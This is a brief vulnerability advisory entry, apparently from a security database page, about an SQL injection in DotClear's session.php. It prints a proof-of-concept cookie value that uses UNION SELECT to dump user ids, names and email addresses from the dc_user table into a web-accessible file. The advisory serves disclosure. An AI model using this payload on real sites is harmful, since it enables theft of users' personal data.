|
DotClear Session.PHP SQL Injection Vulnerability
No exploit is required. The following proof of concept is available: dc_xd=siegfried'/**/UNION/**/SELECT user_id,user_pseudo,user_nom,user_email from dc_user into outfile "/var/www/blah"/* |
|
|
Privacy Statement |